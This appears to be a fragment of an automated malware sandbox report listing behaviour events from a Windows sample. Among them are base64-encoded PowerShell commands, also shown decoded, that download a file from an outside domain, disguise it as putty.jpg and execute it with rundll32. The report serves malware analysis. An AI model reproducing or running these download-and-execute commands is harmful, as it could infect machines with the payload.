Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs